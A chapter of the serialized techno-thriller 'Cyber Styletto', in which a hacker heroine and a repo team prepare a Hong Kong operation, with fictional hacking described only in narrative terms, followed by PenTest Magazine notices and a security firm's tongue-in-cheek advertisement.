While Stokes cemented his relationship to Buck and the rest of the team, Yvonne pulled out her laptop and started typing. There was a Chinese spy satellite in synchronous orbit over Hong Kong from which she might be able to get images from the airport. The warehouse that stored Network Systems computers assembled in China was nearby, and if she could locate it, they could create a map of how best to execute both her mission and Buck’s simultaneously.

The limo quieted as she worked. “No,” she said. “Keep talking. Don’t let me kill the conversation because I have some work to catch up on.”

She nodded towards the driver. Pansy Po may trust him, but Yvonne could not afford that luxury. In Macau, she knew, everyone had a price – even Pansy’s driver could be working both sides.

The others traded more gambling and war stories while she hacked away. Finding a signal from the satellite was the easy part – she knew from experience what wavelengths the Chinese – and most other sovereignties – used regularly. But what encryption keys might be employed this week were anyone’s guess. She launched a search program, but it might take some time to unlock it – her laptop was nowhere near as powerful as the computers in her lab, and it crunched the numbers like it. She might have to continue the process in the hotel room, which was riskier, since the longer it took to complete the task, the better the chance her activity might show up on People’s Liberation Army security agency scans. A stationary target was easier to locate.

Stokes saw what she was doing and leaned in. He whispered, “CyberCom intelligence says they’re using one of the Jinzhong protocols. You might narrow your search there.”

She switched to CyberCom’s private communications channel and accessed a secret folder. It listed protocols intelligence had uncovered in the previous month. She typed in a few more commands to go in that direction. Within a minute the program had given her access to the satellite’s output and functionality. It was currently relaying images from a military installation in Taiwan.

“The bastards,” Stokes said. “That’s a violation of international sovereignty.” He smiled at Yvonne, to acknowledge that she’d be doing the same thing.

Yvonne changed the coordinates to position the camera to Hong Kong International and the satellite responded.

“I can’t do this for very long before they realize what’s going on. Maybe just a few seconds,” she said. “So I’m going to have to take wide angle shots. As long as we can blow them up later, they’ll be fine.”

“This is the first time I’ve ever hoped their resolution was as good as ours,” Stokes said.

She downloaded images for fifteen seconds, and then disconnected the link. “Glad we were able to do that while we were moving. I hope it’s enough to tell us what we need.”

“If not we can always take a taxi together and try again.”

Yvonne rolled her eyes at Stokes to let him know it was another nice try that wasn’t going to work.

Pansy met them at the hotel. Thanks to her history in the casino Yvonne was given a million dollar limit at the tables. Each of the men was allowed fifty thousand, plus bar privileges, which made them visibly happy. For accommodations, the men were doubled up in ground floor villas. Buck and Nigel volunteered to room together in what they called the “seniors suite.”

“You know how early we elders have to get to bed,” Nigel joked. Colin and Silk, being the youngest, paired off. “Great,” Colin said. “There’s an Armageddon Squadron tournament I can play in while we’re here.”

That left Stokes and Woody. Stokes took another look at the big man and said, “If there’s only one bed in that room I’m in a lot of trouble.”

Yvonne was given a penthouse. She and Pansy dismissed the rest of the crew, and went off for a brief tour, and then to the owner’s private office. If Buck had missed anything in decorating his place back in San Francisco, Pansy had it here…and more. The furniture, she explained, was all handcrafted. Hardwoods from South America, Macael marble from the quarries in Spain. Yvonne sat in a Reitveld chair and sipped a twenty two-year single malt. Pansy sat and draped her hands, heavy with jewels, over the arms of her chair. Against the royal backdrop, she looked something like an empress from one of the dynasties. It was not too far from the truth – she and her family had created a new ruling class, even among the supposed socialism of the Chinese state.

“You’re quite the host,” Yvonne said. “I feel guilty coming here to ask for a special favor.”

“I always show my friends the best times. Besides, I am still in your debt for saving the casino’s network. Anyone else and I’m sure we would have been hacked by gangsters. What I spend to entertain you and your friends is just a fraction of what that would have cost me.”

“In that case,” Yvonne said, sipping her Scotch, “I need a few things for that project I mentioned in my message. You still have your munitions connections, I assume.”

“In this business, I have to,” she said. “But I thought you didn’t like guns.”

“I don’t. But this job has some special risks. I don’t always go on location to do my work. I usually snoop long distance, where the bad guys can’t touch me.”

“Something here in Macao?”

Yvonne explained the logistics of her search. “We landed here first because I have to sneak into Hong Kong. I may still be on their list of suspects wanted for questioning. Besides, I needed someone I could trust to help with this equipment.”

“Got your shopping list?”

“A van, for starters,” Yvonne said. “With the logo of the Cathay ComputerWorks on the side. And then some weapons – enough for six.”

“I can get you some Uzi-Pro. They have a polymer pistol grip. Your boys will love them. I’ll see about some explosives too.”


“Oh, I don’t think we’ll need that.”

“You better take them along. And I’ll see you get some night vision goggles. Best to poke around when it’s dark.”

“Are you sure?”

“You computer nerds are all alike,” Pansy said. “Never think about the physical danger. You’re lucky you have me on your side, Yvonne. Brains and beauty – we still make a good team.”

“Wait a minute,” Yvonne said. “Brains and beauty? What’s left for you?”

Pansy laughed and hugged her. “You have brightened my week,” she said. “I’ll make sure everything is waiting for you when you get to Hong Kong. But now, come on, let’s have some fun before you have to leave.”

They started for the casino when Pansy stopped and put her hand on Yvonne’s shoulder. “Speaking of special risks, there’s one more thing you should know.”

Yvonne lifted an eyebrow.

“Shi is in Hong Kong too,” Pansy said.

“Does he know I’m coming?”

“No. But I wanted you to be on guard. Ever since Hong Kong went back to China he’s had a thing for harassing foreigners there. His men are always looking to make trouble. You show up with your team and someone’s sure to notice.”

“Thanks. I’ll have the boys split up on the ferry so we’re not so obvious.”

They walked into the casino and paused to survey the action. Yvonne looked for the team members, but Pansy stopped and fixed her gaze on Colin, who was trying his luck on the slots.

“Yours?” she asked.

“Just a plaything.”

“May I borrow?”

Yvonne led Pansy over and introduced her.

“Having any luck?” Pansy asked him.

“Not a bit. These things aren’t rigged, are they?”

“Totally fair,” she said. “But slots is for children. Come with me and I’ll show you an adult game.”

“Like…?”

“We’ll start with baccarat. After that, who knows?”

Colin shot a look at Yvonne, as though he might offend her by going off with Pansy. Instead she wanted to thank her friend again, but to say it in front of him would be rude.

“I don’t mind at all. Go ahead,” she said. “Get yourself an education.”

Pansy winked at her, confirming that the young man would no doubt learn a few things in the course of the evening.

In the morning the team met in Yvonne’s suite to go over photos of the airport. “We’ve had our fun, gentlemen,” Buck told them, “but now it’s time to prove we deserve the big money. This mission is going to be tougher than usual. Not only do we have to avoid the usual airport security, but our repo target is connected to the government, and has his own people. We don’t know whether they’ll be in proximity when we move to take the Boeing, so we’re going to have to do recon before we can move in. It’s one thing to take a plane from a corporate hangar. Taking one from a member of the Chinese government is something else.”

“This has international incident written all over it,” Stokes said. “Any connection to U.S. government operations would be a disaster for CyberCom and NSA.”

“That means you have to stay as far in the background as possible, Stokes,” Buck said.

“And then there’s my little project,” Yvonne said. “I need to get into the Network Systems warehouse and examine a few of their servers to determine if this is where the Mandarin chip is being added.”

“Exactly. We need to coordinate all this.”

Yvonne spread satellite photos that Pansy had printed for her over the coffee table. The resolution was not as sharp as she had hoped, owing to the small window of time she had to download them before Chinese authorities caught on to her activities. The Network Systems warehouse was in among a block of industrial buildings in a remote area. It was at least a half mile from the hangar that housed the 777, and she could not be sure which structure, exactly, was the one she sought.

“So it’s not going to be easy,” Buck said. “Our best plan is to recon the warehouse and the jet during the day, and make our move in the wee hours. Woody can go with Yvonne for protection, and we’ll take Colin to compensate.”

When they were done with the preliminary logistics, Yvonne slipped the photos into her briefcase. “Pansy tells me Hong Kong is crawling with Chinese intelligence these days. We’re going to have to be extra careful.”

“Shi Tao?” Stokes asked.

“Yes. My old friend from MIT.”

“And my counterpart in espionage at PLA. It’s hard to believe he learned everything he knows in America, and then took it back to China to work against us.”

“The American way,” Colin said. “Give our enemies access to our secrets and then act surprised when they use it.”

“I’ve always had a thing for him,” Stokes said. “Maybe we’ll get to finally meet.”

Yvonne held her emotions inside. She’d had a thing for Shi when they were back at MIT, too. He’d been as smart as she when it came to computer theory. And he’d been able to hide his motives the entire time they were together.

“Listen,” she said. “When we land in the city we have to split up. We can’t just have six American commandos…” She looked at Stokes. “Make that five… walking down the street together.”

“Best let me go by myself,” Silk said. “I blend in better than the rest of you.”

Yvonne wasn’t sure. He was only half Asian, and the half that was his father seemed pretty obvious. But Buck had said Silk knew how to hide himself, and she trusted that opinion.

She and Colin would pretend to be a couple again. Buck would pass as her dad, Nigel as his.

That left Stokes and Woody to team up. Woody looked Stokes over like he was choosing a ripe tomato. He paused, took a deep breath, and said, “You think people will really believe you’re my bitch?”

Everyone broke up, except for Stokes. When the meeting was over Yvonne decided to disguise herself before the ferry to Hong Kong. She wanted no part of Shi Tao. Their time together had been difficult. He was jealous, vindictive, and a nightmare of competitiveness. Even when they were dating he made every class assignment a personal battle between them to see who was better at writing and hacking code. It was because of him she almost gave up her career before it started.

It wasn’t even a class assignment, but a dare. Yvonne boasted she could infiltrate secure systems faster than he, so he made her prove it. The elevators in the Langham Hotel had just been converted to a computer system that had improved their efficiency thirty-five percent. It had been in the Globe. The system figured out how long it would take each car to respond to a call, and sent the one that would get there first.

“We’ll screw them up,” he said. “Take the whole system down.”

He was more malicious than she had imagined. But she couldn’t resist the competition. She had to beat him. She decided she would get in, send a car or two to the wrong floor, and get out. No one would even realize she’d done it. They raced to see who could hack in first. They sat, brazenly, in the lobby and typed away.

“I’m in!” she said, just a moment before he said the same thing. The next step was to prove she had affected the system. But in her rush to win she forgot her plan to divert the cars – there just wasn’t time. Instead she simply pulled the plug on the entire system. As did Shi. They both yelled, “Done!” at the same time.

They laughed and pushed at each other playfully. No one could tell who had actually reached the system controller first, so this one would have to be declared a tie. But Yvonne stopped laughing right away. Paramedics had been called to the lobby. There were people trapped in the elevators. “Don’t worry,” Shi said, “they’ll figure it out in plenty of time.”

Except that one of the people on an elevator was an old man who had suffered an attack of angina. His wife was bringing him down to meet the medics. Now they were in between floors. Yvonne could almost hear her screams for help into the emergency phone.

By the time the hotel techs were able to access the car and reach the couple, the old man had gone into cardiac arrest. He died on the way to the hospital. Maybe if they hadn’t been playing with the system he would have made it. Maybe Shi had been the one to pull the system’s plug. Did any of that matter? She knew it didn’t. Shi couldn’t care less.

“His number was up,” he said when he learned what happened. For him, it was all about being on top, no matter who got in the way. They didn’t see each other after that; didn’t even speak again until graduation. And since then she had promised herself – no violence, nothing that could inflict anything more than financial harm.

Knowing Shi, he’d given her picture to every security agent under his command, and she’d be picked up the minute she showed her face. She had to do something about that.

She took her hair and fixed it into a ponytail, then stuffed it under a coolie hat she bought the night before, after she’d met with Pansy. She chose her most unremarkable outfit from the clothes she’d brought – baggy jeans and a tan blouse – and added a large pair of tourist sunglasses. Still she was afraid it was not enough. Someone would recognize her. Most of her missions had been conducted in the safety of cyber space. This time she’d have no firewall to protect her.

A knock on the door startled her. Stokes said he’d left his pen on the table. When she let him in it was his turn to laugh.

“Who are you supposed to be?” he asked. “A refugee from a Charlie Chan movie?”

But when she admitted her fears about being seen, he softened.

“Here,” he said, opening one of her suitcases. “Let’s see if we can do something about that look.” He found her makeup kit and opened it, over her protest.

“Relax,” he said. “You forget I was in the field for years as part of my CIA career. I had to learn a few tricks to keep from being spotted.”

He knelt in front of her and applied powders and mascara. He took her hair from the ponytail, grabbed a hair brush and restyled her. Yvonne felt the gentleness of his hands as he worked; his touch was soft, the way she remembered.

When he was done and she looked in the mirror, she saw a completely different woman – a tourist from America, somewhere in the Midwest – not exactly a look she’d ever thought of achieving, but a far cry from the Uygur province.

“I’d still go with the sunglasses, though,” he said. “Just to be sure.”

“You should do something about your appearance, too,” she said.

“Very funny.”

“I’m serious. Shi must know who you are. It would be quite a coup for him to have you in custody.”

He reached into his jacket pocket and pulled out a fake mustache. It was more of a small caterpillar placed between the nose and upper lip, an Inspector Clouseau getup that made Yvonne laugh as he adjusted the corners. Stokes wasn’t so bad after all. If only he hadn’t been married.

She reached to grab her bags for the ferry trip, but Stokes beat her to it. “Can’t let you hurt those magic hands,” he said as he headed for the elevator. “Those fingers may just save us from the next cyber attack.”

END Chapter Six

By Mike Brennan and Richard Stiennon

You can buy the paperback version of Cyber Styletto, which includes black and white sketches of the characters, by clicking on LuLu.Com


In the upcoming issue of PenTest Magazine: Web Application Devices. Available to download on June 22nd.

If you would like to contact the PenTest team, just send an email to [email protected] or [email protected]. We will reply a.s.a.p.

PenTest Magazine has the right to change the content of the next Magazine Edition.


www.p2sol.com securityservices @ p2sol dot com

Security Services

$50,000 Firewall ruined by a lack of cents!

Hacked because someone used password123 as a “temporary” password…

SERVICES AVAILABLE • $250,000 Intrusion Detection System • $50,000 Redundant Firewalls • $300,000 Salaries for IT Security Personnel • $400,000 Gee Whiz Computer Defense Shield

Sleep better with our D3tangler™ technology!

Our new patent pending D3tangler technology helps you win the evolving game of IT security. The technology solves all your security problems by pressing a button! Don’t be fooled by cheap competitors’ products!

Apologies for the above marketing gimmick, but it was necessary to grab your attention. We could tell you that we offer superior information security services followed by a highly biased list of reasons, quotes of industry sources, and facts to support our assertions. However, we both know that you know that game, so let’s change the rules and let the truth in our advertisement speak for our work, and maybe you’ll give us the opportunity to let our work speak instead. For the same reasons that clever marketing can sell an inferior product, your entire network can be hacked, starting with one little email. Interested, or shall you skip to the next page?

As a proof of concept, the soft copy version of this document contains custom embedded software control codes designed to gain control over your computer, then, masquerading as you, manipulate stock prices using information contained on your system. Buy buy! Sell sell! Sound farfetched? Maybe 5 years ago, but that is today’s new paradigm. Forgive the fear tactics, but the point is that skillful social manipulation in conjunction with “embedded software control codes” are the methods used by malicious parties to compromise (gain control of) modern networks. This challenge can only be met with intelligence.

We combine software engineering, security know-how, and data analysis to offer real world peer based metrics of your security issues as well as deep dive technical assessments ranging from penetration / technical assessments to strategic reviews.

AUDIT SUPPORT

Strategic and Technical assessments for audit firms, audit, and IT departments:

• Penetration Testing • Security Assessments • Disaster Recovery • Special Projects

PEER BASED EVALUATION

Ongoing comparison against peers of key IT security metrics and controls. Periodic reporting of key metrics.

STATISTICAL PENETRATION

Periodic rotation of professional penetration testers against your network via a custom portal complete with the ability to limit the scope and depth of testing according to client needs.

USER EDUCATION

Custom security training exercises for your organization, including use of penetration tests as a way of providing users an unforgettable experience.

Contact: Shohn Trojacek - [email protected] 120 N. MAIN BRYAN, TX 77803 Tel 939.393.9081


• Checklists, tools & guidance

• Local chapters

• Builders, breakers and defenders

• and more...

“We help protect critical infrastructure one byte at a time”